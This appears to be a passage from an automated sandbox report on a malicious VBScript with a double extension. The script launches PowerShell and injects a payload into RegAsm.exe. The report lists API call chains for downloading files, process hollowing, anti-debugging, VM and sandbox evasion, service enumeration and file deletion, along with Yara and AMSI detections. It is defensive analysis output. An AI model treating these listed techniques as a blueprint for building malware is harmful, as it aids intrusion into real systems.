                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0045B11A | push esp; ret | 4_2_0045B141
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0045E54D | push esi; ret | 4_2_0045E556
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00457A28 | push eax; ret | 4_2_00457A46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00434E56 | push ecx; ret | 4_2_00434E69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_10002806 | push ecx; ret | 4_2_10002819
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0044693D | push ecx; ret | 7_2_0044694D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0044DB70 | push eax; ret | 7_2_0044DB84
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0044DB70 | push eax; ret | 7_2_0044DBAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00451D54 | push eax; ret | 7_2_00451D61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0044B090 | push eax; ret | 8_2_0044B0A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0044B090 | push eax; ret | 8_2_0044B0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00451D34 | push eax; ret | 8_2_00451D41
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00444E71 | push ecx; ret | 8_2_00444E81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00414060 | push eax; ret | 9_2_00414074
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00414060 | push eax; ret | 9_2_0041409C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00414039 | push ecx; ret | 9_2_00414049
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_004164EB | push 0000006Ah; retf | 9_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00416553 | push 0000006Ah; retf | 9_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00416555 | push 0000006Ah; retf | 9_2_004165C4
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_040D0F28 | push eax; ret | 10_2_040D0F62
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_040D0F68 | push eax; ret | 10_2_040D0F72
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_040D0F78 | push eax; ret | 10_2_040D0F82
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_040D0F88 | push eax; ret | 10_2_040D0F92
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_06EC33D8 | push FFFFFFE8h; retf | 10_2_06EC33E1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_06EC1FC8 | push eax; mov dword ptr [esp], ecx | 10_2_06EC21B4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00406EB0 | ShellExecuteW,URLDownloadToFileW, | 4_2_00406EB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0041AA4A | OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, | 4_2_0041AA4A

                  Hooking and other Techniques for Hiding and Protection

                  Source: Possible double extension: gif.vbs Static PE information: createdthingstobefrankwithmeeverywhere.gIF.vbs
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 4_2_0041CB50
                  Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7244, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7632, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0040F7A7 Sleep,ExitProcess,4_2_0040F7A7
                  Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,7_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,4_2_0041A748
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
                  Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4222
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5637
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 2237
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 7237
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: foregroundWindowGot 1767
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6539
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3231
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7550
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2233
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | API coverage: 9.6 %
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4112 | Thread sleep time: -11990383647911201s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4320 | Thread sleep count: 235 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4320 | Thread sleep time: -117500s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6152 | Thread sleep count: 2237 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6152 | Thread sleep time: -6711000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6152 | Thread sleep count: 7237 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6152 | Thread sleep time: -21711000s >= -30000s
                  Source: C:\Windows\SysWOW64\wscript.exe TID: 2300 | Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 | Thread sleep time: -11990383647911201s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7680 | Thread sleep count: 7550 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7684 | Thread sleep count: 2233 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7708 | Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409253
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_2_0041C291
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_2_0040C34D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409665
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0044E879 FindFirstFileExA,4_2_0044E879
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_2_0040880C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0040783C FindFirstFileW,FindNextFileW,4_2_0040783C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00419AF5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040BB30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040BD37
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_10006580 FindFirstFileExA,4_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0040AE51 FindFirstFileW,FindNextFileW,7_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,8_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,9_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,4_2_00407C97
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_00418981 memset,GetSystemInfo,7_2_00418981
                  Source: powershell.exe, 0000000A.00000002.3373832812.0000000006BD0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
                  Source: RegAsm.exe, 00000004.00000002.3268413511.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.2144857446.0000000005A7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2125342287.0000000005A7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2127051789.0000000005A7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2123291367.0000000005A7D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3352588129.0000000007C81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: wscript.exe, 00000005.00000003.2138407115.000000000331F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2125566333.0000000003306000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2141540834.0000000003323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2141056632.0000000003306000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2138288688.000000000331A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2137941761.000000000330E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.2143677707.000000000332B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2124716308.00000000032CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2142018214.0000000003328000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2126019365.000000000332D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2137522930.0000000003307000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWhO
                  Source: RegAsm.exe, 00000004.00000002.3268413511.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@
                  Source: wscript.exe, 00000005.00000002.2143371503.00000000032F6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: agerVirtual DiskHyper-V Guest Service InterfacevmicheartbeatHyper-V Data Exchange ServiceHyper-V Remote Desktop Virtualization ServicevmicshutdownHyper-V Time Synchronization ServiceHyper-V PowerShell Direct ServicevmicvssVolume Shadow CopyWindows TimeWalletServiceWarpJITSvcBlock Level Backup Engine ServiceWindows Biometric ServiceWindows Connection ManagerWindows Connect Now - Config RegistrarDiagnostic Service HostDiagnostic System HostMicrosoft Defender Antivirus Network Inspection ServiceWebClientWindows Event CollectorWindows Encryption Provider Host ServiceProblem Reports Control Panel SupportWindows Error Reporting ServiceWi-Fi Direct Services Connection Manager ServiceStill Image Acquisition EventsMicrosoft Defender Antivirus ServiceWinHTTP Web Proxy Auto-Discovery ServiceWindows Management InstrumentationWindows Remote Management (WS-Management)Windows Insider ServiceWLAN AutoConfigMicrosoft Account Sign-in AssistantLocal Profile Assistant ServiceWindows Management ServiceWMI Performance AdapterWindows Media Player Network Sharing ServiceWork FoldersParental ControlsPortable Device Enumerator ServiceWindows Push Notifications System ServiceSecurity CenterWindows SearchWindows UpdateWWAN AutoConfigXbox Live Auth ManagerXbox Live Game SaveXbox Accessory Management ServiceXbox Live Networking ServiceAgent Activation Runtime_27859GameDVR and Broadcast User Service_27859Bluetooth User Support Service_27859CaptureService_27859Clipboard User Service_27859Connected Devices Platform User Service_27859ConsentUX_27859CredentialEnrollmentManagerUserSvc_27859DeviceAssociationBroker_27859DevicePicker_27859DevicesFlow_27859MessagingService_27859Sync Host_27859Contact Data_27859PrintWorkflow_27859Udk User Service_27859User Data Storage_27859User Data Access_27859F
                  Source: wscript.exe, 00000005.00000002.2143238123.00000000032D9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: r-v guest service interfacevmicheartbeathyper-v data exchange servicehyper-v remote desktop virtualization servicevmicshutdownhyper-v time synchronization servicehyper-v powershell direct servicevmicvssvolume shadow copywindows timewalletservicewarpjitsvcblock level backup engine servicewindows biometric servicewindows connection managerwindows connect now - config registrardiagnostic service hostdiagnostic system hostmicrosoft defender antivirus network inspection servicewebclientwindows event collectorwindows encryption provider host serviceproblem reports control panel supportwindows error reporting servicewi-fi direct services connection manager servicestill image acquisition eventsmicrosoft defender antivirus servicewinhttp web proxy auto-discovery servicewindows management instrumentationwindows remote management (ws-management)windows insider servicewlan autoconfigmicrosoft account sign-in assistantlocal profile assistant servicewindows management servicewmi performance adapterwindows media player network sharing servicework foldersparental controlsportable device enumerator servicewindows push notifications system servicesecurity centerwindows searchwindows updatewwan autoconfigxbox live auth managerxbox live game savexbox accessory management servicexbox live networking serviceagent activation runtime_27859gamedvr and broadcast user service_27859bluetooth user support service_27859captureservice_27859clipboard user service_27859connected devices platform user service_27859consentux_27859credentialenrollmentmanagerusersvc_27859deviceassociationbroker_27859devicepicker_27859devicesflow_27859messagingservice_27859sync host_27859contact data_27859printworkflow_27859udk user service_27859user data storage_27859user data access_27859windows push notifications user service_27859^:
                  Source: wscript.exe, 00000000.00000003.1989416840.000001DA6153D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SERTBO
                  Source: powershell.exe, 00000002.00000002.2167362177.000001B1E9A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: bhvCCC4.tmp.7.dr | Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | API call chain: ExitProcess graph end node graph_4-55334
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | API call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004349F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,4_2_0041CB50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_004432B5 mov eax, dword ptr fs:[00000030h] 4_2_004432B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_10004AB4 mov eax, dword ptr fs:[00000030h] 4_2_10004AB4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00411CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,4_2_00411CFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00434B47 SetUnhandledExceptionFilter,4_2_00434B47
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0043BB22
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00434FDC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_100060E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_10002639
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_10002B1C

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match | File source: amsi64_4432.amsi.csv, type: OTHER
                  Source: Yara match | File source: amsi32_7244.amsi.csv, type: OTHER
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4432, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7244, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7632, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,4_2_004180EF
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write (3 identical entries)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
